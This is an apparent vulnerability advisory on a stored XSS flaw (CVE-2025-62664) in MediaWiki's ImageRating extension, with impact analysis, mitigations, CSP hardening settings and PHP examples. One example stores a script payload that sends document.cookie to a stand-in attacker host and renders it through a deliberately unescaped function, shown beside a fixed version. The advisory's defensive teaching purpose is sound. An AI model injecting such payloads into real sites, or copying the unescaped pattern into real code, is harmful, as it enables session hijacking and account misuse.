CVE-2025-62664: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in The Wikimedia Foundation Mediawiki - ImageRating Extension
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - ImageRating Extension allows Stored XSS. This issue affects Mediawiki - ImageRating Extension: from master before 1.39.
AI Analysis
Technical Summary
CVE-2025-62664 is a stored cross-site scripting (XSS) vulnerability, CWE-79, in the ImageRating extension for MediaWiki, maintained by the Wikimedia Foundation. The extension writes user-supplied input into generated page HTML without neutralizing it, so a payload submitted once is persisted and then executed in the browser of every user who views the page on which it is rendered. The advisory describes the affected range as "from master before 1.39"; administrators should check Special:Version on each wiki for the installed ImageRating version rather than assume they are on a fixed branch. The CVSS 4.0 vector quoted with the record is network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), and low impact on confidentiality, integrity and availability (VC:L, VI:L, VA:L). PR:N means the payload can be stored by an unauthenticated client on wikis that accept anonymous input; UI:N should be read in the stored-XSS sense that nothing beyond ordinary browsing is needed, because the script still only runs once a victim loads the affected page. Script running in the victim's origin acts with the victim's privileges: it can read what that user can read, issue edits and other actions through the MediaWiki action API (a CSRF token is obtainable from inside the session), deface content, or redirect the viewer to attacker-controlled sites. MediaWiki sets its session cookies HttpOnly by default ($wgCookieHttpOnly), so plain cookie theft through document.cookie is less likely than the generic XSS impact list suggests; in-session actions are the realistic concern. No public exploit had been reported when this record was written. The record was published on October 18, 2025, and no patch or fix commit was linked at the time, so every installed copy of the extension should be treated as affected until a fix is confirmed.
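An added illustration of the CWE-79 pattern the advisory describes, not code from the ImageRating extension: the function names, the rendered fields and the stored payload are assumptions chosen to show the class of bug. The same stored value is rendered once with no escaping and once with context-appropriate escaping.

```php
<?php
// Added example of the stored-XSS pattern behind CVE-2025-62664. This is NOT the
// ImageRating extension's code; function names, fields and the payload are assumed.

// Constructed sample of what an attacker could submit through a field that the
// extension later echoes into a page (the "stored" half of stored XSS).
const STORED_PAYLOAD = 'cat"><script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// Vulnerable: string concatenation with no escaping. The stored value becomes
// markup, so the injected <script> runs in every viewer's browser.
function renderRatingVulnerable(string $imageName, string $category, int $rating): string {
    return '<div class="image-rating" data-category="' . $category . '">'
        . $imageName . ' rated ' . $rating . '/5</div>';
}

// Hardened: every untrusted value is escaped for the context it lands in.
// ENT_QUOTES escapes both quote styles, so the attribute cannot be broken out of,
// and < > & are neutralised in the text node. Inside a real MediaWiki extension
// the equivalent is Html::element()/Html::rawElement() with attributes passed as an
// array, which escape for you; htmlspecialchars is used here so this runs stand-alone.
function renderRatingHardened(string $imageName, string $category, int $rating): string {
    $esc = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="image-rating" data-category="' . $esc($category) . '">'
        . $esc($imageName) . ' rated ' . $rating . '/5</div>';
}

// Self-check: the hardened output must not contain a raw <script> tag.
$vuln = renderRatingVulnerable('Example.jpg', STORED_PAYLOAD, 4);
$safe = renderRatingHardened('Example.jpg', STORED_PAYLOAD, 4);
echo 'vulnerable output contains <script>: ' . (strpos($vuln, '<script>') !== false ? 'yes' : 'no') . "\n";
echo 'hardened output contains <script>:   ' . (strpos($safe, '<script>') !== false ? 'yes' : 'no') . "\n";
echo $safe . "\n";
```

Run with `php example.php`. The point is where the neutralization happens: the payload is stored unchanged in both cases, and only the render step decides whether it becomes markup. Filtering on input would not have helped the vulnerable function against data that reached the database another way.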
Potential Impact
For European organizations the impact depends on how the wiki is used. Internal knowledge bases, documentation sites and public collaborative wikis running ImageRating all expose their readers: an injected script runs with the viewer's session, so an attacker can read what that user can read, perform edits and other actions as that user, deface pages, or send visitors to malware or phishing pages. That affects the confidentiality and integrity of wiki content directly, and availability indirectly if the script is used to delete or corrupt pages at scale. Public-sector bodies, universities and companies with open or semi-open wikis are most exposed, because the collaborative model is exactly what lets the payload be stored. Since the quoted vector requires no privileges and no interaction beyond browsing, exposed wikis are a plausible target for automated injection. Where personal data of users or staff is reachable through a compromised session, GDPR notification duties and reputational damage follow.
Mitigation Recommendations
European organizations should act now rather than wait for a fix. First, identify exposure: Special:Version on each wiki lists installed extensions and their versions, and a search for ImageRating in LocalSettings.php confirms whether it is loaded. Track the Wikimedia Foundation's security announcements and the extension's repository for a fix and apply it as soon as it is available. Until then, disable the extension (remove or comment out its wfLoadExtension call) if the rating feature is not essential; if it is, restrict anonymous access to the wiki where practicable. Input validation at the wiki boundary is not the fix: the defect is missing output escaping in the extension's page generation, and a local patch should escape at render time with MediaWiki's Html helpers or htmlspecialchars rather than filter input. Deploy a Content Security Policy ($wgCSPHeader, starting with $wgCSPReportOnlyHeader to observe violations before enforcing) that limits where scripts may load from and blocks inline scripts, and confirm that $wgCookieHttpOnly remains enabled and $wgRawHtml is off. Audit stored rating data and recent edits for injected markup and review access logs for unusual submission rates. A web application firewall with XSS signatures adds friction but is bypassable and does not replace the fix. Educate users and administrators to report anomalous page behaviour, and keep tested backups so defaced or deleted content can be restored.
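An added LocalSettings.php hardening fragment covering the containment and CSP steps above. It is not part of this advisory or of MediaWiki's own documentation; it assumes ImageRating is loaded with wfLoadExtension(), the report endpoint URL is a placeholder, and the CSP array keys follow the $wgCSPHeader documentation and should be checked against the docs of your MediaWiki release.

```php
<?php
// Added hardening fragment for LocalSettings.php (not from the advisory or from
// MediaWiki docs). Assumes ImageRating is loaded via wfLoadExtension(); the
// report-uri is a placeholder; CSP keys per $wgCSPHeader docs, verify for your release.

// 1. Containment: stop loading the vulnerable extension until a fixed release is
//    installed. Stored payloads stay in the database, but nothing renders them.
// wfLoadExtension( 'ImageRating' );

// 2. Content Security Policy. Begin in report-only mode to learn which legitimate
//    resources the wiki and its other extensions load, then enforce.
$wgCSPReportOnlyHeader = [
    'default-src' => [],   // self only; MediaWiki adds what its own scripts need
    'script-src'  => [],   // no third-party script hosts
    'report-uri'  => 'https://csp-reports.example.org/collect', // placeholder
];
// Once the report stream is clean, enforce the same policy:
// $wgCSPHeader = $wgCSPReportOnlyHeader;

// 3. Defaults worth pinning explicitly. HttpOnly keeps document.cookie from
//    exposing the session to injected script; $wgRawHtml = true would let any
//    editor embed raw HTML, which is a second, self-inflicted XSS vector.
$wgCookieHttpOnly = true;
$wgCookieSecure   = true;   // only send the session cookie over HTTPS
$wgRawHtml        = false;
```

Keep the report-only phase short: a policy that is never enforced stops nothing, and a policy enforced without observing first tends to break skins and extensions that load scripts from elsewhere.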
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain
Technical Details
- Data Version: 5.1
- Assigner Short Name: wikimedia-foundation
- Date Reserved: 2025-10-18T04:03:51.879Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68f317da8ff74c446c8a11f3
Added to database: 10/18/2025, 4:30:18 AM
Last enriched: 10/25/2025, 4:46:29 AM
Last updated: 12/1/2025, 5:46:27 AM
Related Threats
- CVE-2025-13809: Server-Side Request Forgery in orionsec orion-ops (Medium)
- CVE-2025-13808: Improper Authorization in orionsec orion-ops (Medium)
- CVE-2025-13807: Improper Authorization in orionsec orion-ops (Medium)
- CVE-2025-13806: Improper Authorization in nutzam NutzBoot (Medium)
- CVE-2025-13800: Command Injection in ADSLR NBR1005GPEV2 (Medium)